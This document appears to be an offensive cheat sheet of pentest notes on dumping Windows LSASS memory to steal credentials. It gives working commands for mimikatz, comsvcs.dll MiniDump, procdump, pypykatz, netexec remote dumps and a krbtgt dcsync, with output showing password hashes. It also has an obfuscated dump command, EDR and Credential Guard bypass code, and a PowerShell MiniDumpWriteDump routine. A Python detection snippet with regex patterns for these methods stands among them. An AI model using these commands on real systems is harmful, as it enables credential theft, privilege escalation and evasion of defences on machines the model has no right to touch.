LSASS secrets

Task Manager Method

C:\htb> mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/31/2021 3:00:57 PM
SID : S-1-5-90-0-4
msv :
tspkg :
wdigest :
* Username : WINLPE-SRV01$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
<SNIP>
Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session : RemoteInteractive from 2
User Name : jordan
Domain : WINLPE-SRV01
Logon Server : WINLPE-SRV01
Logon Time : 3/31/2021 2:59:52 PM
SID : S-1-5-21-3769161915-3336846931-3985975925-1000
msv :
[00000003] Primary
* Username : jordan
* Domain : WINLPE-SRV01
* NTLM : cf3a5525ee9414229e66279623ed5c58
* SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
tspkg :
wdigest :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
kerberos :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
ssp :
credman :
<SNIP>
Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
SafetyKatz

SafetyKatz.exe "sekurlsa::ekeys"
BetterSafetyKatz
SharpKatz
SharpKatz.exe --Command ekeys
Dumpert (Direct Syscalls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
Rundll32.exe & Comsvcs.dll Method
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, Minidump <lsass_process_id> C:\Users\Public\lsass.dmp full
LSASS PID in cmd: tasklist /svc
C:\Windows\system32> tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 96 N/A
smss.exe 344 N/A
csrss.exe 432 N/A
wininit.exe 508 N/A
csrss.exe 520 N/A
winlogon.exe 580 N/A
services.exe 652 N/A
lsass.exe 672 KeyIso, SamSs, VaultSvc
svchost.exe 776 PlugPlay
svchost.exe 804 BrokerInfrastructure, DcomLaunch, Power,
SystemEventsBroker
fontdrvhost.exe 812 N/A
LSASS PID in powershell: Get-Process lsass
PS C:\Windows\system32> Get-Process lsass
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1260 21 4948 15396 2.56 672 0 lsass
LSASS dump:
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
Transfer dump
Download - Exfiltration
Transfer over SMB - as for SAM secrets (see SAM & LSA secrets)
Extract Credentials
$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
INFO:root:Parsing file /home/peter/Documents/lsass.dmp
FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)
== Kerberos ==
Username: bob
Domain: DESKTOP-33E7O54
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)
== DPAPI [14ab89]==
luid 1354633
key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605
... SNIP ...
Netexec - CME - Remotely
nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
SMB module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
Procdump
See: https://beta.hackndo.com/remote-lsass-dump-passwords/
C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached.
Load in Mimikatz and Pass The Hash - See Task Manager Method
TrickDump
MultiDump
Obfuscated LSASS Dump
PS C:> start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}}
PS E:> &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % { $_.FullName }), `#-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full; Wait-Process -Id (Get-Process rundll32).id ;

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process
-Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt();
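A defender-side check for the dump methods on this page (rundll32/comsvcs MiniDump, procdump -ma lsass, and the wildcard-obfuscated variant just above), added here as an example and not part of the original notes: it flags Sysmon Event ID 10 style process-access records that open lsass.exe with a memory-read access mask, and shows that command-line string matching alone misses the obfuscated form. The ExampleAV sensor path and all sample records are constructed.

```python
import re

# Process access rights (winnt.h); MiniDumpWriteDump needs VM_READ plus a QUERY right.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Command-line indicators for the dump methods shown on this page (string matching only).
CMDLINE_PATTERNS = [
    ("comsvcs MiniDump", re.compile(r"comsvcs\.dll.*minidump", re.I)),
    ("procdump of lsass", re.compile(r"procdump.*-ma\s+lsass", re.I)),
]

def mask_allows_dump(granted_access):
    # True if the granted access mask is enough to read lsass memory for a dump.
    if granted_access & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        return True
    query_bits = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
    return bool(granted_access & PROCESS_VM_READ) and bool(granted_access & query_bits)

def classify_process_access(event, allowed_sources=()):
    # Sysmon Event ID 10 style record: flag non-allowlisted readers of lsass.exe.
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.lower() in {s.lower() for s in allowed_sources}:
        return None
    access = int(event["GrantedAccess"], 16)
    return f"lsass read by {source} (GrantedAccess=0x{access:x})" if mask_allows_dump(access) else None

def classify_cmdline(cmdline):
    # Process-creation command line: name of the matching indicator, or None.
    for name, pattern in CMDLINE_PATTERNS:
        if pattern.search(cmdline):
            return name
    return None

# Constructed sample telemetry modelled on the commands above (not real events).
ALLOWED = [r"C:\Program Files\ExampleAV\sensor.exe"]  # hypothetical allowlisted scanner
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS, "GrantedAccess": "0x1fffff"},
    {"SourceImage": ALLOWED[0], "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
]
SAMPLE_CMDLINES = [
    r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full",
    r"procdump.exe -accepteula -ma lsass.exe lsass.dmp",
    r"&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gps l?a*s).id dmp.tmp full",  # obfuscated: no literal match
]
```

Tools listed on this page that reuse an existing handle or dump a forked or reflected copy of LSASS do not open lsass.exe directly, so treat the process-access signal as one of several rather than the only one.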

Parse dump
RustiveDump
LsassReflectDumping
RtlCreateProcessReflection
ShadowDumper

MiniDumpDotNet
.\minidumpdotnet.exe <LSASS_PID> <minidump_file>
Using tasklist /v to enumerate the LSASS PID is detected by EDR.
FindLSASSPID.cpp
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>

// Find the PID of a process by image name (e.g. "lsass.exe") by walking a
// Toolhelp snapshot instead of spawning tasklist. Assumes a non-UNICODE build,
// where PROCESSENTRY32::szExeFile is a char array. Returns 0 if not found.
int FindPID(const char* procname)
{
    int pid = 0;
    PROCESSENTRY32 proc = {};
    proc.dwSize = sizeof(PROCESSENTRY32);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;
    bool bProc = Process32First(snapshot, &proc);
    while (bProc)
    {
        if (strcmp(procname, proc.szExeFile) == 0)
        {
            pid = proc.th32ProcessID;
            break;
        }
        bProc = Process32Next(snapshot, &proc);
    }
    CloseHandle(snapshot);  // release the snapshot handle
    return pid;
}
Nanodump
POSTDump
Powershell - Bypass Defender for Endpoint
function Write-MemoryDump {
    param(
        [string]$outputPath
    )
    # Get-ProcessId, the [DumpGenerator] P/Invoke wrapper for MiniDumpWriteDump and
    # $FullMemoryDump (the MINIDUMP_TYPE value for a full dump) are defined elsewhere in the script.
    $processId = Get-ProcessId
    if (-not $processId) { return $false }
    try {
        # Open target process; the Process object owns the handle it exposes
        $process = [System.Diagnostics.Process]::GetProcessById($processId)
        $processHandle = $process.Handle
        if (-not $processHandle) {
            Write-Host "Failed to open target process with PID: $processId"
            return $false
        }
        Write-Host "Successfully opened target process with PID: $processId"
        # Create dump file
        $fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
        $fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
        Write-Host "Dump file created at $outputPath"
        # Write memory dump
        $success = [DumpGenerator]::MiniDumpWriteDump(
            $processHandle,
            [uint32]$processId,
            $fileHandle,
            [uint32]$FullMemoryDump,
            [IntPtr]::Zero,
            [IntPtr]::Zero,
            [IntPtr]::Zero
        )
        # Close the file stream and dispose the Process object, which closes its handle
        # (Marshal::Release is for COM interface pointers, not process handles)
        $fileStream.Close()
        $process.Dispose()
        if ($success) {
            Write-Host "Memory dump successfully written to $outputPath"
            return $true
        } else {
            Write-Host "Failed to write memory dump."
            return $false
        }
    } catch {
        Write-Host "An error occurred: $_"
        return $false
    }
}
Lsass-Shtinkering
Go-lsass
Blindsight
AxiomDumper
Bypass Credential Guard
Credential Guard is a virtualization-based isolation technology for LSASS that prevents attackers from stealing credentials which could be used in pass-the-hash attacks.
NativeBypassCredGuard.exe patch true
Then run your LSASS dump
LSASS Forked Dump - Bypass Crowdstrike EDR
Morpheus
Extracts lsass.exe in RAM and exfiltrates it via forged NTP packets.